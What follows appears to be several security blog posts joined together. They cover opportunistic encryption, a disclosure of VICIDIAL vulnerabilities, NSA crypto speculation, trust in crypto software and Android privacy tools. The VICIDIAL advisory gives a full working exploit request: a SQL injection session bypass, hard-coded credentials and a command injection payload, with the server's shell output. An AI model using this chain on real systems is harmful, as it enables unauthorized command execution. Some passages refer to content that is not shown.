Opportunistic encryption has become quite a hot topic recently, and blew up in a big way thanks to an Internet Draft that was published on February 14th for what amounts to sanctioned man-in-the-middle. Privacy advocates were quickly up in arms - but it’s not that simple (see here). As pointed out by Brad Hill, this isn’t about HTTPS traffic, but HTTP traffic using unauthenticated TLS; thanks to poor wording in the document, it’s easy to miss that fact if you just skim it.
It’s routine practice for ISPs to MITM unencrypted traffic today; it’s well known that Comcast does it. This practice won’t change once we move to HTTP2, regardless of unauthenticated TLS - the only question is whether users will know about it.
But this isn’t about that single internet draft, it’s about what this tells us about opportunistic encryption.
We’ve seen many smart people get very upset (myself included) over a misunderstanding about how opportunistic encryption fits into the new HTTP2 paradigm. What does that tell us about how it’ll be perceived in the future?
What does opportunistic encryption buy us?
We can break attackers down into two classes:
Active - Will intercept and re-route traffic, at small or large scale.
Passive - Will watch what goes over the wire, but is unable or unwilling to interfere with it.
Opportunistic encryption prevents passive attackers from collecting data; they will either fail or be forced into an active role (if they are positioned and financed to do so). While many talk about increasing the cost of surveillance for groups like the NSA, I doubt that will create a substantial impact - we know that they are both active and passive today. They are already positioned for active attacks when they so desire, though the increased complexity and resource demands may reduce monitoring of lower-value targets.
What opportunistic encryption doesn’t do
Unauthenticated TLS skips the most vital step in the process - it doesn’t verify that the server is actually the one you intend to talk to, meaning anyone who can control network traffic between you and the end server can pretend to be that server and monitor all traffic. Which is exactly what we have today with HTTP traffic.
So, you know your traffic is encrypted; what you don’t know is who has the keys, or how many people have seen the traffic. You’re safe from passive threats, but you get no protection against active threats - though, to be fair, none is intended.
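To make the distinction concrete, here’s a minimal Python sketch (mine, not from any draft) of what an unauthenticated TLS client amounts to: the channel is encrypted, but the peer’s identity is never checked.

```python
import ssl

# A client context with certificate verification disabled - encryption
# with no identity check, which is what "unauthenticated TLS" boils down to.
ctx = ssl.create_default_context()
ctx.check_hostname = False         # don't verify the server's name...
ctx.verify_mode = ssl.CERT_NONE    # ...or its certificate at all

# Any active attacker who terminates the handshake now presents a
# perfectly acceptable "identity" - only the passive attacker is defeated.
assert ctx.verify_mode == ssl.CERT_NONE and ctx.check_hostname is False
```

A connection made with this context will happily negotiate strong ciphers with whoever answers - your server, or the box in the middle.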
Should we pursue it?
If people weren’t involved - it eliminates a class of attacks without substantial costs, and forces passive attackers to become active. Overall, that sounds like a win, but there’s a problem: people.
Opportunistic encryption isn’t real security - it doesn’t stand up to active attackers, and it provides protection against only a specific type of attack. Real TLS provides protection against both active and passive threats. If people understood this, opportunistic encryption would be fine - but it’s clear that people don’t.
If people see it as a “just works” alternative to real TLS, then the harm it does greatly outweighs the value it provides. It will give a false sense of security, when in reality there is none.
Update: The SQL Injection vulnerability has been assigned CVE-2013-4467, and Command Injection assigned CVE-2013-4468.
VICIDIAL (a.k.a. Asterisk GUI client) is an open-source dialer built on top of the Asterisk PBX. It’s written in PHP, and has a significant number of security issues.
In addition to the open-source project, the company behind VICIDIAL, The Vicidial Group, also offers VICIDIAL in a hosted environment.
At this time, the current release version is still vulnerable. The vendor reports that hosted users are on a fixed version, and proposed releasing the OSS code in mid-July; as of October 23rd, no update or advisory has been released.
After discussions with other researchers, I have made the decision that after waiting more than 140 days for a release, patches, or an advisory warning users, the next responsible step is to disclose the issue publicly.
This is not a decision I take lightly, but I believe at this point users of this application should understand the degree of risk involved, and have details so they can take action to minimize that risk.
Tested versions: 2.7RC1, 2.7, 2.8-403a; it is likely other versions are affected.
There are three vulnerabilities that I will discuss here:
Pre-Auth SQL Injection in ./apc/SCRIPT_multirecording_AJAX.php
Hard-Coded User Credentials
Command Injection in ./agc/manager_send.php
There are pre and/or post authentication SQL injection flaws in nearly every file in the ./agc directory. The web portion is split between ./agc (which is the ‘agent’ interface) and ./vicidial (the administrative interface). My review did not include the ./vicidial directory, though a quick glance indicates that there are likely many issues there as well.
There are many other issues, from XSS to a possible DoS in which an attacker can write directly to a log file until the free space on the server is exhausted.
There’s also ./vicidial_mysql_errors.txt - it might be of interest as it contains query parameters.
I will not document all of the issues that I’ve found; partly because I don’t want to take the time, and also because I feel bad for the team at OSVDB - hundreds of entries for the same application wouldn’t be fun.
Pre-Auth SQL Injection
This is your typical, boring, SQL injection:
SCRIPT_multirecording_AJAX.php - Line 44
<?php...$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";
The $campaign variable is unsanitized and passed directly to the query. This isn’t the best SQL Injection ever, but it demonstrates the issue.
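To show the pattern end to end, here’s a self-contained Python/sqlite3 stand-in for the vulnerable query (the `users` table and all data are hypothetical, purely for illustration):

```python
import sqlite3

# Hypothetical schema mirroring the query above.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE vicidial_campaigns (campaign_id TEXT, campaign_rec_filename TEXT)")
db.execute("INSERT INTO vicidial_campaigns VALUES ('1001', 'rec-1001')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

# The vulnerable pattern: string interpolation, just like the PHP above.
campaign = "x' UNION SELECT password FROM users WHERE username='admin"
stmt = ("select campaign_rec_filename from vicidial_campaigns "
        f"where campaign_id='{campaign}'")
leaked = db.execute(stmt).fetchall()   # the admin password, not a filename

# The fix: a parameterized query treats the input as data, not SQL.
safe = db.execute(
    "select campaign_rec_filename from vicidial_campaigns where campaign_id=?",
    (campaign,),
).fetchall()                           # no rows - the payload is inert
```

The same one-line change - binding the parameter instead of interpolating it - is what the PHP code needs as well.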
Hard-Coded User Credentials
There are two accounts created when you install VICIDIAL that have hard-coded passwords and are used by the software. While these accounts have minimal permissions, they do allow an attacker to reach portions of the code not accessible without a valid user account.
Both accounts have the same password: donotedit.
In multiple locations, there are calls to passthru() that do not perform any filtering or sanitization on the input. In this case, we are looking at ./agc/manager_send.php line 429.
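Here’s a hypothetical Python stand-in for that `passthru()` pattern - attacker input handed to a shell with no filtering - showing why a `;` in a parameter means arbitrary command execution (the `echo dialing` command is illustrative, not VICIDIAL’s actual command line):

```python
import subprocess

extension = "1234;echo INJECTED"       # attacker-controlled parameter
out = subprocess.run(
    f"echo dialing {extension}",       # the shell sees two commands, not one
    shell=True, capture_output=True, text=True,
).stdout
print(out)   # "dialing 1234" on one line, "INJECTED" on the next
```

Anything after the `;` runs with the web server’s privileges - exactly what the `id` / `uname -a` output later in this post demonstrates.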
To exploit this, the following values must be set:
session_name=AAAAAAAAAAAA (or any other value at least 12 bytes long)
server_ip=' OR '1' = '1
The payload is passed in the extension parameter; for my testing, I used `;id;uname -a;` (URL-encoded in the request below).
As you’ve probably noticed, the value for server_ip isn’t just a dummy value, it’s taking advantage of a SQL Injection vulnerability on line 285:
<?php...$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
This allows us to bypass the check for an active session, and we use the hard coded credentials to get around the need for authentication.
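A quick Python/sqlite3 reconstruction of that session check (schema and data hypothetical) shows why the injected `server_ip` defeats it even when the attacker has no session at all:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE web_client_sessions (session_name TEXT, server_ip TEXT)")
# The only session belongs to someone else; the attacker has none.
db.execute("INSERT INTO web_client_sessions VALUES ('legituser0001', '10.0.0.5')")

session_name = "AAAAAAAAAAAA"          # any value at least 12 bytes long
server_ip = "' OR '1' = '1"            # the injected value from above
stmt = ("SELECT count(*) from web_client_sessions where "
        f"session_name='{session_name}' and server_ip='{server_ip}';")
(count,) = db.execute(stmt).fetchone()
# AND binds tighter than OR, so the WHERE clause becomes:
#   (session_name='AAAA...' AND server_ip='') OR ('1'='1')
# which is true for every row in the table.
print(count)   # 1 - the "active session" check passes
```

Any non-zero count satisfies the check, so one row from any user’s session is enough.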
When you execute this, it looks like this:
GET http://192.168.10.131/agc/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3Bid%3Buname%20-a%3B&user=VDCL&pass=donotedit HTTP/1.1
HTTP/1.1 200 OK
Date: Sun, 02 Jun 2013 23:22:38 GMT
Server: Apache/2.2.21 (Linux/SUSE)
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
<!-- sending login sipsak message: LIN- -->
uid=30(wwwrun) gid=8(www) groups=8(www)
Linux linux-0y3h 3.1.10-1.23.1-pae #1 SMP Tue May 21 12:46:34 UTC 2013 (8645a72) i686 i686 i386 GNU/Linux
ERROR Exten is not valid or queryCID LIN--130602192238 is not valid, Originate command not inserted
As you can see, when you run this, the returned text from the shell is included in the middle of the body of the server’s response.
Timeline & Vendor Response
The vendor quickly acknowledged the issues and promised quick fixes. As time has gone on, their hosted users have received the security fixes, while users of the open-source version remain unaware of the issue and unprotected.
6/3/2013 - Vendor notified
6/3/2013 - Vendor confirmed
6/13/2013 - Vendor states first phase of changes complete; began rolling out fixes to hosted users.
6/15/2013 - Requested release timeline.
6/15/2013 - Vendor requests disclosure delay till mid-July 2013.
7/3/2013 - Vendor advises second phase of changes complete and being pushed to hosted users.
8/26/2013 - Requested status update.
8/27/2013 - Vendor advises final phase of changes complete; hosted users updated with all security changes. Expects to release OSS code in two weeks.
9/20/2013 - Requested status update.
9/25/2013 - Vendor advises of unrelated delay. Expected to complete work for next release by 9/30.
10/23/2013 - Decision made that further delays not in the public interest.
This (somewhat) hypothetical conversation is becoming more common in the face of uncertainty and wild speculation. We have seen a glimpse into the greatest adversary that cryptography has. And we’ve learned almost nothing.
We know they have attacks, but we don’t know against what. Is Diffie-Hellman broken? Is ECC backdoored? Has the RSA problem been solved? Or maybe they’ve only found a somewhat more efficient way to factor RSA keys? I’ve also heard speculation that they’ve broken RC4. They might have backdoors in OpenSSL or Microsoft’s CAPI.
We have no idea.
Here’s what we do know: in the past, uncertainty and speculation drove adoption of snake-oil solutions - flawed, nonsensical technologies that did more harm than good. Speculation today risks driving people from something that’s safe to tools that leave them fully exposed.
It’s hard to give pragmatic advice in the face of such uncertainty; but we must be cautious, and we must not panic. I won’t accuse anyone of over-reacting, as what we have seen is startling to say the least - but there are bigger risks to consider.
For example, let’s assume for just a moment that the NSA has, in fact, influenced the ECC specification to include curves with weaknesses known to itself. What are the risks?
The NSA is able to decrypt messages at will.
A well equipped adversary (say, another state funded group) could discover the flaw, and exploit it.
Neither of those gives me warm-fuzzies, but there are worse things: in the panic over “OMG - ECC is broken,” people hastily switch to magic solutions that rely on obscurity and have no proven security, or to hastily implemented, poorly configured solutions that leave them vulnerable not only to nation-state-level adversaries, but to much smaller ones as well.
If in the panic over ECC one was to move to an RSA based system with weak keys - they are likely to be far more vulnerable than they would have been, had they done nothing at all.
This of course applies to many scenarios, not just ECC - and personally, I trust ECC over RSA, at least when using curve25519 or other non-NSA-supplied curves.
There are no good answers to be found right now; all we can do is exercise caution and try to keep people from over-reacting and making their problems worse.
[N.B. I realize that meet-in-the-middle isn’t practical against AES-256 with technology as we know it, but it had to be pointed out. Also, please, please don’t use the double AES-256 / AES-512 code. Really. Just don’t.]
Even as a child I was fascinated by cryptography - and often left the local librarians with puzzled looks thanks to the books I would check out. It’s so elegantly simple, and yet massively complex. There is one very unusual property of crypto though - it’s not about math or modes, it’s about trust.
Cryptography, especially as used today, has the most wonderful dichotomy of trust: on one hand, crypto, by its very nature, is used in situations lacking trust. On the other hand, to use crypto - you have to trust it.
But what is it?
This is where it gets interesting - let’s say you download GPGTools, what is the chain of trust?
Has anyone verified that the GPGtools binaries match the source code in the git repo? Im suspicious of any binary distro encryption software
The installer hasn’t been tampered with by your ISP, their upstream providers, GPGTools’ hosting company - all of this is before you even get to the people that publish the software! (And we know this is being done.)
The computer that built the binaries was free of malware, or other backdoors.
The source code hadn’t been modified, without the knowledge of the developers.
The developers haven’t modified the code to add backdoors or otherwise weaken it.
The compiler, and other libraries are free of backdoors or other modifications that would alter the resulting binaries.
I could keep going, there’s more - but this gives an idea of how many things you have to trust, not just for every application - but every update of every application.
You could compile everything yourself of course (if it’s open source, that is) - but that only eliminates some of these issues. You still have to trust the code, and you still have to trust the developers.
Well, you could audit the code. If you know what you’re doing, in a few weeks you might actually get to the point of installing it - by which time, of course, there will be a new update.
Can’t we fix this?
Some of it, yes - maybe. The Tor project is working on deterministic builds, which would allow others to verify that the released binary was built from a specific revision of the source code. This is really quite impressive, and something I truly applaud them for.
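What a deterministic build actually enables is simple: anyone can rebuild the same source revision and compare digests with the published binary. A sketch, with placeholder bytes standing in for real files:

```python
import hashlib

def digest(data: bytes) -> str:
    """SHA-256 hex digest of a binary's contents."""
    return hashlib.sha256(data).hexdigest()

released = b"bytes of the published binary"
rebuilt  = b"bytes of the published binary"   # my own build of the same revision

matches = digest(released) == digest(rebuilt)
print(matches)   # True only if the release really came from that source
```

The hard part isn’t this comparison - it’s making the build process byte-for-byte reproducible in the first place, which is what the Tor project’s work addresses.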
But that doesn’t lessen the trust you place in the developers and the code - is it actually secure? Are they even competent to be doing this work? Are there bugs in the PRNG or key negotiation that could render the system pointless? There’s still a level of trust required.
What about the standards?
We know that the government has sought to backdoor or weaken systems in the past - from the Clipper chip, to illogical export restrictions, to attempts to enact laws mandating backdoors (CALEA II). Now we know that, after losing the Crypto Wars of the past, they have been clandestinely doing the same things.
The single biggest things that you have to trust are the protocols and algorithms - they are the most complicated, and only a very small number of people are qualified to audit them. If the protocol has deliberate flaws, or there is a backdoor in the algorithm - then your efforts to encrypt may be for nothing.
It’s all about trust
I’m a big fan of taking the “trust no one” position (and myself least of all), but in the world of cryptography - it’s not that easy. Every step of the way you have to trust something.
@gentmatt way to miss the point. "Trust, but verify". The time for verification has come.
Some say, “trust but verify” - and I agree, but full verification is a dream that will never come true. There aren’t enough qualified eyes, and there is far too much code involved.
With so many dependencies, so many places something malicious could be injected - it’s almost overwhelming to think about. In my eyes though, the first, and most important step, is helping people to understand the chain of trust. If you understand what you are trusting, you can ask better questions.
There is no real answer here - this is simply how it is. If you use cryptography (and you aren’t a true cryptographer), then you’re taking a leap of faith. If you didn’t compile all of the tools you use - it’s an even bigger leap.
[N.B. This article was planned before the Bullrun story broke; but in light of these recent events, I’ve updated and published this ahead of schedule.]
As it turns out, it’s quite easy to make your Android phone NSA-proof. It’s a simple method, and anyone can do it - all you need is a few ounces of thermite!
Let’s shoot for something a little more attainable - spy resistant. We can’t stop every attack, but we can reduce the attack surface a bit. Here are a few tools that I’ve been using recently to do just that.
Boxcryptor Classic - Like many people, I use Dropbox for certain low-sensitivity files. But what about things that require a little more care? Boxcryptor Classic encrypts files and then stores the encrypted copy in Dropbox. It’s simple, the security seems sound, and the free edition is quite adequate. It may not be perfect, but it suits my needs nicely.
TextSecure - It’s open-source, it’s free, and it’s from Moxie - what’s not to love? It stores all of your SMS & MMS data encrypted, and can encrypt the data over the air when texting another TextSecure user.
Currently it uses the SMS/MMS service for messaging, and is Android only; both of those things are changing soon. It’ll be using the data channel and supporting iOS in the near future.
Kaiten Mail & APG - Kaiten is a low-cost ($4.99) mail client; though if you want to go cheaper, its open-source cousin K-9 Mail is free. They are developed by the same core team, though Kaiten seems to get new features first, which are then ported into K-9. I like supporting OSS developers, so I happily went with the paid version. It works great with my Google Apps email account, though it does take some getting used to.
Where it really comes in handy, though, is when you use it with APG, the Android Privacy Guard. It’s a simple, minimalistic OpenPGP tool that integrates nicely with Kaiten and K-9, making it simple to send encrypted or signed mail from your phone.
This does though require that your private key be on the device, so keep that risk in mind.
APG is a bit dated - it hasn’t been updated since 2010, so it’s clearly been abandoned. Thankfully, Dominik Schürmann has forked the project and is working on a major update (new GUI, new API, etc.) that should be ready early next year.
VpnCilla - Next up is a highly configurable VPN client ($4.99). WiFi is great - except for the small evil of your traffic being so simple to monitor; and with recent work on femtocell systems, even 3G/4G connections can’t be fully trusted. Having a VPN handy is a must.
You’ll also need a good VPN service; my current pick is zipline; it’s fast, cheap, and from a trusted professional (Dan Tentler).
RedPhone - Another tool from Moxie, RedPhone secures your voice communications via encrypted VoIP. Or at least so I’ve read - I never actually make voice calls on my personal phone anymore.
Others - There are various other useful things - Google Authenticator (2FA all the things, right?), ConnectBot to SSH into your server to do anything you don’t want to do from your phone, use wifitrack & Wifi Analyzer to better understand what’s in your area.
There is, of course, obvious configuration to make things a bit safer. Make sure you have a good password, or at least a long PIN set - don’t trust patterns, and don’t bother with a 4 digit PIN.
USB debugging must be turned off - otherwise there’s no point in locking your phone. Some other settings help, but not enough - one big one is Android’s full disk encryption.
Hashkill now cracks Android FDE images master password. Speed is ~135k on 6870, ~270k/s on 7970. Android FDE is weak. pic.twitter.com/mhcvEuEP48
If you only have a short numeric PIN, the FDE is little better than a wet paper bag.
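To put numbers on that, here’s a back-of-the-envelope worst-case calculation at the ~270k/s rate quoted in the tweet (assuming a straight brute force of the FDE master password; keyspace choices are mine):

```python
rate = 270_000                     # guesses per second on a 7970 (per the tweet)

pin4 = 10 ** 4                     # 4-digit PIN keyspace
alnum8 = 62 ** 8                   # 8-char mixed-case alphanumeric keyspace

print(pin4 / rate)                 # ~0.04 seconds - effectively instant
print(alnum8 / rate / 31_536_000)  # ~25 years, even at this modest rate
```

A single mid-range GPU exhausts every 4-digit PIN before you can blink; a real passphrase pushes the same attack out by decades.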
It’s not all great though, there are still weaknesses - plenty in fact. Thanks to USB MUXing there is probably a debug interface - and maybe even a full shell on your phone, and you have no way of turning it off. There may be flaws in the baseband or other software that could allow an attacker to gain control.
The list goes on and on. And that’s before considering that your phone company hands over all of your call records, or the various apps you need that have no secure replacement.
There is no such thing as an NSA proof phone - unless you literally melt it. What we can do though is make it harder to be spied on; make the attackers work for every bit of data. Give nothing away for free.